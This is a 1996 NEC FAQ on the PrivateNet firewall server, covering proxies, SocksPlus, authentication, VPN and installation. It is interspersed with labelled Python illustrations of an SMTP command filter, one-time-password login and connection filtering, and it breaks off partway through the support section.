Frequently Asked Questions About The
PrivateNet™ Secure Firewall Server

NEC Technologies
Internet Business Unit
110 Rio Robles Drive
San Jose, CA 95134
Phone: 1 (800) 668-4869
(department code: YWEB)

PROPRIETARY NOTICE AND LIABILITY DISCLAIMER

The information disclosed in this document, including all designs and related materials, is the valuable property of NEC Technologies, Inc. (NEC) and/or its licensors. NEC and/or its licensors, as appropriate, reserve all patent, copyright, and other proprietary rights to this document, including all design, manufacturing, reproduction, use, and sales rights thereto, except to the extent said rights are expressly granted to others. This document does not constitute a warranty of any kind, express or implied, with respect to the NEC product(s) discussed in this document. Unless expressly provided for in a separate limited warranty statement obtained at the time of sale of the NEC product(s), NEC makes no warranties of any kind or nature concerning the NEC product(s) including (but not limited to) any warranties (express or implied) of merchantability, performance, fitness for a particular purpose or against infringement of intellectual property rights.

As to information on limited warranties or lack thereof concerning all other product(s) discussed in this document, please contact the manufacturers of the respective product(s). To allow for design and specification improvements, the information in this document is subject to change at any time, without notice. Reproduction of this document or portions thereof without prior written approval of NEC is prohibited. NEC is a registered trademark of NEC Corporation. The PrivateNet Server and SocksPlus are trademarks of NEC Technologies, Inc. Other brands, logos, and product names are trademarks or registered trademarks of their respective holders.
© 1996 NEC Technologies. All rights reserved.


TABLE OF CONTENTS

GENERAL FIREWALL QUESTIONS

1. What is a firewall?
2. Why does my network need a firewall?
3. What things can a firewall protect?
4. What things can't a firewall protect against?
5. What is a virtual private network?

PROXIES AND OPERATING SYSTEMS

6. What is a proxy?
7. Why do I need proxies?
8. Are all proxy technologies equal?
9. Is there a good alternative to SOCKS 4.2?
10. Why is BSD/OS a good choice for a firewall operating system?
11. I understand that Windows NT has a C2 security rating. Wouldn't NT make a better firewall operating system?

THE PRIVATENET SECURE FIREWALL SERVER

12. What is PrivateNet?
13. Could you explain the PrivateNet server's architecture?
14. Do my client applications have to be changed if I decide to use the PrivateNet server?
15. What additional security features are provided?
16. What kind of user authentication is provided?
17. Can PrivateNet provide a VPN facility?
18. Can the PrivateNet server protect against unauthorized access between my internal subnets?
19. How does the PrivateNet server protect my internal subnet? Is the protection equal to what is provided for external network access?
20. How does the PrivateNet server allow me to control access to network services for individual client users?
21. Do my client applications have to be changed if I decide to use the PrivateNet server?
22. What commercial client applications currently support the SOCKS 4.2/SocksPlus proxy?
23. Can the PrivateNet server be connected to any network?
24. What hardware makes up the PrivateNet server?
25. What software makes up the PrivateNet server?
26. Has the PrivateNet server been thoroughly tested?

SERVER CONFIGURATION

27. How do I configure the PrivateNet server?
28. How do I administer the PrivateNet server?
29. Who installs the PrivateNet server?
30. Will NEC provide me with documentation and an installation plan?
31. How long does it take to install a PrivateNet server?
32. What things must I have to install a PrivateNet server?

PRIVATENET SERVER PURCHASE AND SUPPORT

33. How do I buy the PrivateNet server and what does it cost?
34. How do I get PrivateNet server upgrades?
35. What are your warranty and service options?
36. How are upgrades handled?

OTHER PRIVATENET QUESTIONS

37. Does SocksPlus support UDP?
38. Will SocksPlus clients connect from the Internet?
39. What is the Telnet proxy?
40. What is the HTTP proxy?
41. What is the NNTP proxy?
42. How does the SMTP (e-mail) proxy work?
43. How does the domain name server work?
44. Is running a split name server required?


THE PRIVATENET™ SECURE FIREWALL SERVER

FIREWALL BASICS

Q1. What is a firewall?

A. A firewall is a defense mechanism for a network that creates a single narrow security choke point (or gate) through which all traffic must pass, both to and from your network. Firewalls enforce a site's security access policies for its network based on access rules or an access control list. There are a number of ways to control access, but in general the firewall can be thought of as a mechanism to filter and control traffic.

Traditional firewalls are implemented through a combination of hosts and routers. A router can control (or filter) network traffic at the packet level; packets are allowed or denied based on the source/destination address or the port number. This control technique is called packet filtering.

State-of-the-art firewalls are more than just generalized packet filters and often perform their functions from the circuit-level layer up through the application layer of the Open Systems Interconnection (OSI) model. These high-level firewalls typically do not allow a direct connection between hosts and clients on separate networks (such as your network and the Internet). Instead they use a mechanism called a "proxy" process to prevent traffic from passing directly between networks. These modern firewalls also log all access for tighter security audits.

Q2. Why does my network need a firewall?

A. Being connected to the Internet is like living in a rough neighborhood. Having a firewall can greatly reduce the risk that an Internet connection will compromise the safety of internal networks.

A firewall supplements your existing security mechanisms and protects your network from unauthorized intruders, both external and internal to your organization. Firewalls limit your exposure.

Many organizations use the Internet or are planning to use it as a tool for business. Unfortunately, an increasing number of people on the Internet are unscrupulous and may attack vulnerable electronic servers and networks. This presents a major security risk to your network and organization. A firewall can greatly reduce the risk of network break-in and the destruction or theft of data by creating a security choke point. A firewall allows you to easily manage and control access. The most secure firewalls use proxies to eliminate direct connections between networks.

Q3. What things can a firewall protect?

A. Firewalls can protect a network for both incoming and outgoing network traffic by enforcing your security policies, such as:

  • Preventing unauthenticated logins from the "outside world," thereby stopping unauthorized users and vandals from getting access to the machines on your network.
  • Hiding the internal address structure of the network(s) they protect, thus making it difficult for vandals to enter and move freely around your network.
  • Blocking "inside" traffic from reaching the outside world. An example of this might be blocking one of your legitimate users from transferring files inside your network to other machines outside of it.
  • Protecting subnets within your main network by performing the same functions for the subnets as they do for external networks. An example of this would be limiting end-user network access to your personnel server, which is isolated to its own subnet. You might only allow certain authorized personnel access to this subnet by hiding the subnet address scheme and limiting the services provided, such as the Telnet application.

Q4. What things can't a firewall protect against?

A. Firewalls can't protect against attacks that don't go through the firewall. An example might be a malicious employee who copies sensitive information to a diskette, removes the diskette from the office, and then releases it to someone outside your organization. Another example might be that of a trusted employee who sets up a "back door" entrance into your network, perhaps by attaching a dial-up modem to his desktop or laptop computer. Unauthorized people may also succeed in extracting information from employees who are trying to be helpful.

Firewalls also cannot easily protect against viruses, and will be unlikely to do so in the foreseeable future. Virus protection should be implemented as part of a virus protection plan, since viruses can be introduced by many means.

Q5. What is a virtual private network?

A. Recently, there has been a great deal of discussion about virtual private networks. A virtual private network is just another name for an encrypted IP tunnel, typically crossing the Internet. Encryption ensures a high level of privacy in the data that is exchanged, allowing a secure and cost-effective alternative to privately leased lines. Most connections across the Internet are not encrypted and most data is exchanged in clear text, making the data vulnerable to snoopers. The use of encrypted tunnels prevents third parties from listening in on these connections.


PROXIES AND OPERATING SYSTEMS

Q6. What is a proxy?

A. A proxy is a software mechanism that eliminates direct communication between client applications and their servers across separate networks or subnets. The proxies communicate between themselves. Typically, proxies:

  • Are trusted middleware processes that hide the internal address structure of the network(s) they protect;
  • Provide logs of the nature of the traffic crossing the firewall by looking at the content of the data packets;
  • Allow security administrators to limit the network services offered to end-users;
  • Provide secure authentication methods for end-user access.

Q7. Why do I need proxies?

A. You need proxies to:

  • Guard your network against unauthorized access;
  • Limit network services to those end-users who are authorized to use them;
  • Provide a secure authentication scheme independent of applications;
  • Provide detailed security logging based on the application data stream, not just the packet headers.

Q8. Are all proxy technologies equal?

A. No. Different levels of security require different types of proxies. Two proxy technologies are used in modern firewalls:

  1. Circuit-Level Proxy -- Provides a medium level of security and is both flexible and adaptable to the access requirements of an organization. A circuit-level proxy implements a generalized proxy mechanism that relays IP connections from the originating application through the firewall to its destination. The proxy uses an authorization file to verify that a connection is permitted before completing the connection. One popular type of circuit-level proxy is a software protocol known as SOCKS 4.2. SOCKS 4.2 was jointly developed by various organizations, then implemented by Dave Koblas and made publicly available. NEC has been the steward of the free version of SOCKS 4.2 since 1993, managing the FTP site where SOCKS 4.2 source code is available and administering the SOCKS 4.2 mailing list where users of non-commercial SOCKS 4.2 trade notes on SOCKS 4.2 security, configuration and compatibility.

    Although SOCKS 4.2 is popular, it has several limitations:

    • Its software is not layered, leaving it vulnerable to bad packets;
    • It is vulnerable to IP spoofing attacks;
    • It does not provide UDP support.

  2. Application-Level Proxy -- Provides a higher level of security by implementing a specific proxy mechanism for each application service. Application-level proxies "speak" the application protocol for each specific application (e.g. Telnet, FTP, SMTP, etc.). Application-level proxies screen the network traffic passing through the firewall and have an "understanding" of the context of the data within the packets. This is not present in either circuit-level proxies or packet filtering mechanisms.

    The advantage of an application-level proxy over a circuit-level proxy is its ability to understand the flow of information and make intelligent decisions about the various kinds of requests within the packets. As an example, an application-level proxy can eliminate the possibility of using SMTP commands to extract information about the local user population on a network. Commands like EXPN (expanding a mail alias) or VRFY (verify the presence of a user) can be disabled.

Q9. Is there a good alternative to SOCKS 4.2?

A. The SocksPlus™ proxy is a great alternative to SOCKS 4.2. The SocksPlus proxy is an advanced and secure circuit-level technology. The SocksPlus proxy was written from scratch by NEC to provide a commercial circuit-level proxy for the PrivateNet Secure Firewall Server and to avoid any intellectual property issues attached to SOCKS 4.2. The SocksPlus proxy is more secure and commercially robust than the original SOCKS 4.2 protocol.

SocksPlus has been improved from the original SOCKS 4.2 implementation in many ways.

The SocksPlus proxy:

  • Uses proper software layering, leaving it much less vulnerable to bad packet formats;
  • Can be configured to listen only to client connections on the internal network to properly identify IP spoofing attacks that use internal network IP addresses, but which originate from the outside network;
  • Provides UDP support in addition to the TCP support originally found in SOCKS 4.2;
  • Provides for encrypted data communications between SocksPlus proxy servers;
  • Supports parallel configurations, providing both high availability and load balancing between servers;
  • Does not require a configuration file at each client (server information is obtained from DNS);
  • Does not accumulate log information at each client.

The SocksPlus proxy uses its own improved protocol when communicating with SocksPlus proxy clients and other SocksPlus proxy servers, but it is fully backward-compatible with existing SOCKS 4.2 servers and clients. If a site is already using SOCKS 4.2, deploying the SocksPlus proxy will not pose major problems. However, such sites are encouraged to convert to the SocksPlus proxy over time to take full advantage of NEC's improvements.

Q10. Why is BSD/OS a good choice for a firewall operating system?

A. The BSD operating system developed by Berkeley Software Design Inc. is based on the original system developed at the University of California at Berkeley. It has been carefully scrutinized for security holes by many people from various organizations. This is not true of proprietary operating systems. The base code for BSD has been running on thousands of computer systems for many years, proving the code is stable, reliable, and effective for network access. This may not be the case for more recently-developed operating systems.

Q11. I understand that Windows NT has a C2 security rating. Wouldn't NT make a better firewall operating system?

A. A "C2" rating only refers to the system's security when not connected to a network. This rating says nothing about how secure the system is on a network. Also, C2 is a low security rating level.


THE PRIVATENET SECURE FIREWALL SERVER

Q12. What is PrivateNet?

A. The PrivateNet Secure Firewall Server is a network firewall product developed by NEC Technologies' Internet Business Unit and comes complete as an off-the-shelf server including hardware and CD-ROM software. The PrivateNet server is scalable, user-transparent, highly secure and easily configurable. It provides a high level of security for both internal networks (including subnets) and external network connections using a proxy server architecture. The PrivateNet server also logs all transactions, providing detailed audit trails for corporate security analysts.

The PrivateNet server solves several crucial problems for corporate and departmental TCP/IP networks:

  • It allows transparent user access to Internet services such as the World Wide Web (WWW), FTP, Telnet, Gopher, and other new applications as they are developed;
  • It provides industry-leading protection of internal corporate networks against external intrusion;
  • It allows efficient and easily administered partitioning of internal networks into secure subnets.

Q13. Could you explain the PrivateNet server's architecture?

A. The PrivateNet server is designed around a proxy server architecture consisting of a hybrid of two technologies (see Question 8):

  1. The SocksPlus circuit-level proxy for outgoing TCP/IP communications. Outgoing network connections that originate within your network are handled by the PrivateNet server's SocksPlus circuit-level proxy.

    Client applications that need to connect through the PrivateNet server to external networks must first be "Socksified" to communicate with the PrivateNet server. This means that client TCP/IP applications such as Telnet or FTP must first have the SOCKS 4.2 or SocksPlus proxy client libraries linked with them.

    Several commercial client TCP/IP applications in the UNIX, Windows, and Macintosh environments have already been modified for SOCKS 4.2 . NEC, through its Client Applications Program (CAP), continues to work with TCP/IP software vendors to increase the number of client applications that support SocksPlus.

  2. Specific application-level proxies for incoming TCP/IP communications. Incoming network connections are handled by the PrivateNet server's application-level proxies. These proxies handle specific TCP/IP client applications for incoming network connections from the outside world to protect against unauthorized access and snooping on a network or subnet.

    For example, the PrivateNet server's SMTP (Simple Mail Transfer Protocol) proxy disarms certain commands, such as EXPN (expanding a mail alias) and VRFY (verify the presence of a user), by not returning any useful information: these commands only echo back whatever argument was given to them.

    The security-hardened proxies add a further level of security and perform a number of functions such as user authentication, disallowing direct connections between client/server processes, hiding the internal network address scheme, and securing Telnet, UDP, mail (SMTP), news (NNTP) and Web Server (HTTP) services. NEC plans to add other application proxies to the PrivateNet Server.
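The following Python snippet is an added illustration of the EXPN/VRFY disarming described in Question 8 and in point 2 above; it is not NEC's proxy code, and its command lists are constructed for the example. It models the application-level proxy's decision for each SMTP command line: EXPN and VRFY are answered by the proxy itself with a reply that only echoes the argument, so nothing about local users or aliases reaches the outside, while ordinary mail commands are forwarded to the protected mail hub and unknown commands are refused at the firewall.

```python
"""Toy SMTP application-level proxy filter (added illustration, not NEC's code).

The proxy "speaks" SMTP: it parses each client command, answers EXPN and VRFY
itself with a reply that merely echoes the argument (so no user or alias
information leaks), forwards ordinary mail commands to the real server, and
refuses anything else.
"""
import re
from typing import List, Tuple

# Commands the proxy answers itself instead of forwarding (constructed policy).
DISARMED = {"EXPN", "VRFY"}
# Commands the proxy forwards to the protected mail hub (constructed allow list).
FORWARDED = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}

_CMD_RE = re.compile(r"^([A-Za-z]+)(?:\s+(.*))?$")


def filter_smtp_command(line: str) -> Tuple[str, str]:
    """Decide what the proxy does with one client command line.

    Returns ("forward", line) when the command should go to the real server,
    or ("reply", text) when the proxy answers the client itself and the
    command never reaches the internal network.
    """
    line = line.rstrip("\r\n")
    m = _CMD_RE.match(line)
    if not m:
        return "reply", "500 Syntax error, command unrecognized"
    verb, arg = m.group(1).upper(), (m.group(2) or "").strip()

    if verb in DISARMED:
        # Echo the argument back unchanged. A 252 reply ("cannot verify, will
        # try to deliver") is legal SMTP and says nothing about whether the
        # user or alias exists.
        return "reply", f"252 {arg}" if arg else "501 Syntax error in parameters"
    if verb in FORWARDED:
        return "forward", line
    # Unknown or unsupported verbs are refused at the firewall.
    return "reply", "502 Command not implemented"


def run_session(client_lines: List[str]) -> List[Tuple[str, str]]:
    """Feed a scripted client session through the filter; returns the list
    of (action, payload) decisions so the policy can be inspected."""
    return [filter_smtp_command(cmd) for cmd in client_lines]


if __name__ == "__main__":
    # Constructed sample session: a probe for local users mixed with normal mail.
    session = [
        "EHLO probe.example\r\n",
        "VRFY root\r\n",
        "EXPN staff\r\n",
        "MAIL FROM:<sender@example.com>\r\n",
        "DEBUG\r\n",
        "QUIT\r\n",
    ]
    for cmd, (action, payload) in zip(session, run_session(session)):
        print(f"{cmd.strip():35s} -> {action}: {payload}")
```

The filter keeps the protocol state machine in the real server; the proxy only needs to recognize verbs, which is why a short allow list is enough and why anything it does not recognize is refused rather than passed through.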

Q14. Do my client applications have to be changed if I decide to use the PrivateNet server?

A. Sites already using SOCKS 4.2 will be able to switch to PrivateNet without any change. Over the longer term, they may choose to use SocksPlus clients to take full advantage of the improvements in the SocksPlus protocol.

At new sites, it depends on what is currently being used. In many cases, the SOCKS 4.2 or SocksPlus proxy is already part of the client application and can communicate with the PrivateNet server without any modifications. Examples of vendors providing such clients are Netscape, FTP Software, Inc., NetManage, Hummingbird, and Spry/CompuServe.

For UNIX client applications that do not contain SOCKS 4.2 or SocksPlus, it is necessary to recompile and relink the client with NEC's SocksPlus proxy library. This library contains the necessary wrappers for network-related system calls, so that the client can use SocksPlus to connect.

NEC, through its Client Applications Program (CAP), continues to work with TCP/IP software vendors to further increase the availability of client applications that support SocksPlus.

Q15. What additional security features are provided?

A. Unlike packet filtering routers which authorize (permit or deny) each packet, the PrivateNet server uses a "connection filtering" authorization mechanism to determine if a connection should be made. Connection filtering determines authorization only when the connection is initially established and provides a more thorough connection authorization process than traditional packet filtering. When a request for a connection is received by the application-level proxy, the connection is verified based on the traditional source/destination address and port number. In addition, the arrival of all connections on the expected interface is verified.

If a connection request claims to originate from the internal network but arrives on the interface connected to the outside network, it is recognized as a spoofing attempt. Once the PrivateNet server makes the decision to connect, it forwards all packets for that connection.

For even greater security, the PrivateNet server comes with all its software, including the security-hardened BSDI UNIX operating system, on CD-ROM. This is highly secure because a CD-ROM cannot be changed or erased. The CD-ROM is used for initial installation as well as for normal operation. Initial installation is simple: you connect the PrivateNet server to your network, insert the CD-ROM into the CD drive, turn on the machine, and answer some initial configuration questions about your network. The CD-ROM is used for normal operation and server boot-up thereafter.

Q16. What kind of user authentication is provided?

A. The PrivateNet server provides security authentication for remote users who need incoming access to your internal network. Authentication is currently accomplished by a method known as secure network key (SNK) from Digital Pathways, Inc.

SNK uses a calculator-based challenge/response mechanism for user authentication. A calculator must be provided to each authorized user. The PrivateNet server will issue an SNK password "challenge" and the user must enter this challenge into the calculator. The calculator then issues a one-time-only password "response" and the user must type the response back to the PrivateNet server. Assuming the one-time response is correct, the user gains access to your internal network. NEC is also looking at other authentication schemes.
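The exchange described above, written out as an added Python example with both sides' steps. This is not Digital Pathways' SNK algorithm and not NEC's code: the FAQ does not say how the calculator derives its response, so the example uses a generic HMAC-SHA256 construction over a shared secret and the challenge as a stand-in, and the user name and secret are constructed. What it shows is the part that matters at the firewall: each challenge is answered with a one-time response, and a response that has already been used, or that answers a challenge the server never issued, is refused.

```python
"""Challenge/response one-time-password exchange (added illustration).

Server issues a challenge; the user's token computes a short response from
the challenge and a secret only the token and server share; the server admits
the user only if the response matches and the challenge has not been used.
The HMAC-SHA256 arithmetic is a generic stand-in, NOT the SNK algorithm.
"""
import hmac
import hashlib
import secrets
from typing import Dict, Optional, Set, Tuple

RESPONSE_DIGITS = 8  # constructed choice: an 8-digit response is easy to type


def token_response(secret: bytes, challenge: str) -> str:
    """What the hand-held calculator computes: a fixed-width numeric response
    derived from the shared secret and the server's challenge."""
    mac = hmac.new(secret, challenge.encode("ascii"), hashlib.sha256).digest()
    # Take 31 bits of the MAC and reduce to a fixed number of decimal digits.
    value = int.from_bytes(mac[:4], "big") & 0x7FFFFFFF
    return str(value % 10**RESPONSE_DIGITS).zfill(RESPONSE_DIGITS)


class AuthServer:
    """Firewall side: tracks outstanding challenges and refuses replays."""

    def __init__(self, secrets_by_user: Dict[str, bytes]):
        self._secrets = secrets_by_user
        self._pending: Dict[str, str] = {}            # user -> challenge awaiting a reply
        self._used: Set[Tuple[str, str]] = set()      # (user, challenge) already consumed

    def issue_challenge(self, user: str) -> Optional[str]:
        if user not in self._secrets:
            return None                                # unknown users get no challenge
        challenge = secrets.token_hex(4).upper()       # 8 hex digits to type into the token
        self._pending[user] = challenge
        return challenge

    def verify(self, user: str, response: str) -> bool:
        challenge = self._pending.pop(user, None)
        if challenge is None or (user, challenge) in self._used:
            return False                               # nothing outstanding, or a replay
        expected = token_response(self._secrets[user], challenge)
        ok = hmac.compare_digest(expected, response)
        # The challenge is consumed whether or not the answer was right, so a
        # captured response cannot be presented a second time.
        self._used.add((user, challenge))
        return ok


def login_exchange(server: AuthServer, user: str, token_secret: bytes) -> bool:
    """Run one complete login: challenge out, response back, verdict."""
    challenge = server.issue_challenge(user)
    if challenge is None:
        return False
    return server.verify(user, token_response(token_secret, challenge))


if __name__ == "__main__":
    # Constructed user and secret.
    server = AuthServer({"alice": b"alice-token-secret"})
    print("alice with her token:", login_exchange(server, "alice", b"alice-token-secret"))
    print("alice with a wrong token:", login_exchange(server, "alice", b"somebody-else"))
    print("unknown user:", login_exchange(server, "mallory", b"x"))
```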

Q17. Can PrivateNet provide a VPN facility?

A. The PrivateNet server provides a "Virtual Private Network" (VPN) facility by performing data encryption based on the DES or Triple-DES military encryption standards and employing the SocksPlus proxy protocol as transport. This enables a highly secure connection between multiple PrivateNet server devices and allows public networks, such as the Internet, to be used for secure communications.

Performance is very good because data encryption/decryption only occurs at the first and last network hops. DES encryption uses a DES key to encrypt/decrypt communications sessions. Users should be cautioned to protect any random key(s) created and any floppy disks used to store these keys.

Q18. Can the PrivateNet server protect against unauthorized access between my internal subnets?

A. Yes. The PrivateNet server can be configured to filter out unauthorized network traffic packets between subnets. Via the "listen" instruction in the PrivateNet server configuration file, a subnet IP address may be defined to show on which interface and subnet client requests will arrive. Requests arriving on other network interfaces are not served.

Q19. How does the PrivateNet server protect my internal subnet? Is the protection equal to what is provided for external network access?

A. The PrivateNet server's proxies perform the same way for a subnet as they do for an internal network protected from the outside world. The proxies hide subnet IP addresses from other subnets just as they hide internal addresses from the Internet, and they authenticate connections via the "connection filtering" architecture previously described. The proxies disarm all dangerous commands for the protected subnet.

Q20. How does the PrivateNet server allow me to control access to network services for individual client users?

A. The PrivateNet Server can be configured to allow or disallow network services for specific client users on your network. This is accomplished via "client" instructions in the PrivateNet server configuration file. These client instructions can be set to allow or disallow services for single or multiple client IP addresses.
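As an added illustration (not NEC's code, and not the SocksPlus.conf syntax, which this FAQ does not show), the Python below models the three controls described in Questions 15, 18 and 20 together. A connection is authorized once, when it is established; a hypothetical `Listen` binding names the interface on which requests from each subnet are expected, so an internal source address arriving on the external interface is reported as a spoofing attempt; and hypothetical `ClientRule` entries allow or deny named services for a single client address or a whole client subnet, with anything no rule matches denied. The interface names, subnets, rules and sample requests are constructed.

```python
"""Connection-filtering policy evaluator (added illustration; the rule syntax
here is constructed and is not PrivateNet's SocksPlus.conf format).

The decision is made once, when a connection is established, and combines
two checks: a Listen binding (which interface requests from a subnet are
expected on, so spoofed internal sources can be caught) and ClientRule
entries (allow/deny a service for a client address or subnet).
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed service name -> destination port table.
SERVICE_PORTS = {"http": 80, "telnet": 23, "ftp": 21, "smtp": 25, "nntp": 119}


@dataclass(frozen=True)
class Listen:
    """Requests from `subnet` are only accepted on `interface` (hypothetical)."""
    interface: str
    subnet: str


@dataclass(frozen=True)
class ClientRule:
    """Allow or deny `service` ("*" = any) for a client address or subnet."""
    clients: str
    service: str
    action: str  # "allow" or "deny"


@dataclass(frozen=True)
class ConnRequest:
    ingress_interface: str  # interface the connection request arrived on
    src: str
    dst: str
    dst_port: int


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def evaluate(req: ConnRequest, listens: List[Listen], rules: List[ClientRule]) -> Decision:
    src = ip_address(req.src)

    # Check 1: the interface the request arrived on must be the one we listen
    # on for its claimed source subnet. An internal address arriving on the
    # outside interface is the spoofing attempt the FAQ describes.
    binding: Optional[Listen] = None
    for candidate in listens:
        if src in ip_network(candidate.subnet):
            binding = candidate
            break
    if binding is None:
        return Decision(False, f"no listen binding covers source {req.src}")
    if req.ingress_interface != binding.interface:
        return Decision(False, f"spoof: {req.src} claims {binding.subnet} but arrived on "
                               f"{req.ingress_interface}, expected {binding.interface}")

    # Check 2: the first client rule matching source and service decides;
    # a request that no rule matches is denied.
    for rule in rules:
        if src not in ip_network(rule.clients):
            continue
        if rule.service != "*" and SERVICE_PORTS.get(rule.service) != req.dst_port:
            continue
        return Decision(rule.action == "allow",
                        f"rule: {rule.action} {rule.service} for {rule.clients}")
    return Decision(False, "no client rule matched (default deny)")


# Constructed sample configuration: le0 = internal LAN, le2 = personnel
# subnet on its own interface, le1 = the outside world (catch-all, listed last).
LISTENS = [
    Listen("le0", "10.1.0.0/16"),
    Listen("le2", "10.9.0.0/24"),
    Listen("le1", "0.0.0.0/0"),
]
RULES = [
    ClientRule("10.9.0.0/24", "*", "deny"),       # personnel subnet: nothing out
    ClientRule("10.1.2.3", "telnet", "allow"),    # one admin host may Telnet out
    ClientRule("10.1.0.0/16", "telnet", "deny"),  # nobody else on the LAN may
    ClientRule("10.1.0.0/16", "http", "allow"),
    ClientRule("10.1.0.0/16", "ftp", "allow"),
]


if __name__ == "__main__":
    # Constructed sample requests, including one spoofing attempt.
    samples = [
        ConnRequest("le0", "10.1.2.3", "198.51.100.7", 23),
        ConnRequest("le0", "10.1.2.4", "198.51.100.7", 23),
        ConnRequest("le0", "10.1.2.4", "198.51.100.7", 80),
        ConnRequest("le1", "10.1.2.4", "198.51.100.7", 80),
        ConnRequest("le1", "198.51.100.7", "10.1.2.4", 80),
    ]
    for req in samples:
        d = evaluate(req, LISTENS, RULES)
        print(f"{req.ingress_interface} {req.src}->{req.dst}:{req.dst_port}: "
              f"{'ALLOW' if d.allowed else 'DENY'} ({d.reason})")
```

Two design points carry over from the FAQ: the interface check runs before any rule lookup, so a spoofed source can never be allowed by a permissive client rule, and the catch-all listen binding for the outside world is listed last so that internal subnets match first.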

Q21. Do my client applications have to be changed if I decide to use the PrivateNet server?

A. No. In many cases, the SOCKS 4.2 or SocksPlus proxy is already part of your client application and can communicate with the PrivateNet server. These are clients provided by such vendors as Netscape, NetManage, FTP, SPRY, etc. For those MS Windows client applications which do not utilize the SOCKS 4.2 or SocksPlus proxy, you will need to install NEC's dynamic-link library and executable(s); e.g. for Microsoft Windows, SOCKSpls.dll and SOCKSpls.exe. For UNIX client applications which do not utilize the SOCKS 4.2 or SocksPlus proxy, you will need to link NEC's SocksPlus proxy libraries into your UNIX client applications.

Q22. What commercial client applications currently support the SOCKS 4.2/SocksPlus proxy?

A. Netscape provides SOCKS 4.2 support on all of its platforms, and will therefore work with PrivateNet. In addition, SOCKS 4.2 is supported by FTP Software, Inc., NetManage and Mosaic from the Spry/CompuServe Internet Division.

Q23. Can the PrivateNet server be connected to any network?

A. Yes. The PrivateNet Server can be configured to work with any TCP/IP network. However, the PrivateNet server currently only supports Ethernet 10Base-T physical connections. NEC is in discussion with BSDI, DEC and other vendors to provide support for FDDI as well as other major network communications technologies. NEC plans to support other communications media such as Token Ring, Fast Ethernet, and T1.

Q24. What hardware makes up the PrivateNet server?

A. The PrivateNet server includes:

  • 75-MHz Pentium processor
  • 16 Mbyte RAM
  • 540-Mbyte hard disk
  • one 1.44-Mbyte floppy disk
  • one 4X CD ROM drive
  • two Ethernet interface cards

Q25. What software makes up the PrivateNet server?

A. The PrivateNet server includes the following software, all on CD-ROM:

  • BSDI 2.0 UNIX operating system
  • Complete set of NEC application proxies and SocksPlus proxy server daemons, containing special encryption algorithms
  • SocksPlus proxy client libraries located on an additional CD-ROM

Q26. Has the PrivateNet server been thoroughly tested?

A. Yes. In addition to normal development testing, the PrivateNet server has been tested at a number of Beta sites for several months. Beta sites include clients both internal and external to NEC.


SERVER CONFIGURATION

Q27. How do I configure the PrivateNet server?

A. Provide TCP/IP information such as IP addresses, domain name, etc., requested by the PrivateNet server's automatic "Configure" script. Configure is run automatically just after boot time during installation. If necessary, Configure can be run again to reinitialize all configuration data by removing the Configure file and rebooting. A security administrator can completely reload and reconfigure the PrivateNet server in a matter of minutes using this procedure, thus ensuring that the server maintains its planned security functions with authorized configuration data and NEC-provided proxies.

Q28. How do I administer the PrivateNet server?

A. Update the PrivateNet server configuration data found in the SocksPlus.conf and authorize.conf files. The SocksPlus.conf file contains all rules necessary for access control and server-to-server connections. The rules are fairly traditional, using source and destination addresses and port numbers to determine if a given client should be allowed to connect through the server. The SocksPlus.conf file is also used to determine the behavior of server-to-server connections. Configuration statements determine which PrivateNet servers will be allowed to connect to other PrivateNet servers. These statements also allow departmental servers to be administered separately from other PrivateNet servers at the corporate firewall level. The SocksPlus.conf file also provides for time-outs and rules limiting the types of connection allowed.

The authorize.conf file contains the rules for how users can connect through a PrivateNet server. These rules determine which users can Telnet in from the Internet, what type of authentication should be used, and the kind of access each user will be allowed.


PRIVATENET SERVER INSTALLATION

Q29. Who installs the PrivateNet server?

A. Typically, an NEC-authorized VAR will install the server, thus assuring a customer of a turnkey installation. Customers with a high level of networking and security expertise may choose to install the server themselves. NEC trains its VARs in basic installation and in various networking configurations with the PrivateNet server. NEC will assist with installation as needed.

When the server is installed at complex sites, or sites with general security issues, the NEC Security Expert Referral Program (S.E.R.P.) will provide a source of security expertise. This network is made up of independent consultants who can assist the VAR and customers as needed.

Q30. Will NEC provide me with documentation and an installation plan?

A. In addition to technical, user, and installation manuals, NEC provides a configuration questionnaire with several example network configurations for each PrivateNet server. The VAR will give the questionnaire and network configuration to you before your installation. You should complete the questionnaire and work with the VAR to create a network design for the PrivateNet server. The server can then be installed either for new or existing networks. NEC will assist as needed with planning and installation.

Q31. How long does it take to install a PrivateNet server?

A. It takes 45 minutes to a few hours, depending on network hardware and software configuration and availability of the network for reconfiguration and physical cabling.

Q32. What must I have to install a PrivateNet server?

A. The following are needed:

You must complete the Software License Agreement and send it back to the Internet Business Unit before installation. Typically the VAR will ensure that this is complete before installation. NEC will then provide a license key for activation of the CD-ROM-based software being installed on the PrivateNet server. The license number must be typed into the PrivateNet server during initial installation to activate the software.

You need an ASCII terminal, PC or laptop computer that is capable of an industry-standard emulation such as VT-100, as well as a serial RS-232C cable (and possibly a null modem adapter). This is attached to the COM-1 console port on the PrivateNet server. The ASCII terminal will be used to configure the server initially. You will need one or two 10Base-T (RJ45) cables for attachment to your Ethernet network.

You will also need a revised network design for your new PrivateNet server(s). Specific information needed:

  • new host name(s) for the PrivateNet server(s);
  • internal IP address(es) and internal network mask for the PrivateNet server(s);
  • a physical network interface to the PrivateNet server (10Base-T);
  • new external network IP address(es) and external network mask;
  • a fully qualified Internet domain name;
  • IP address(es) of your internal name server(s);
  • a fully qualified upstream DNS authoritative host name for your Internet domain;
  • the IP address of the default route;
  • the fully qualified host name of the internal mail hub.

Your VAR will help you.

Up to Contents

PRIVATENET SERVER PURCHASE AND SUPPORT

Q33. How do I buy the PrivateNet server and what does it cost?

A. You can buy the PrivateNet server from any VAR authorized by the Internet Business Unit. The list price is approximately $14,950, including hardware and CD-ROM software.

Up to Contents

Q34. How do I get PrivateNet server upgrades?

A. The PrivateNet server software may be upgraded by simply removing the old CD-ROM, replacing it with the new CD-ROM upgrade, which is a complete package, and then rebooting the PrivateNet server.

Upgrades will be announced by NEC and provided to our distributor, Ingram Micro. They will provide all upgrade replacement CDs to their NEC-approved VARs. The VARs will provide the upgrade to their customers.

Up to Contents

Q35. What are your warranty and service options?

A. Warranty, service, and support requests are handled via a toll-free number (800-325-5500) on a seven-day, 24-hour basis. Maintenance is performed during normal business hours unless a customer purchases the 7 x 24 option, for which server maintenance is performed within an eight-hour time period in most major metropolitan areas.

Hardware and software support include:

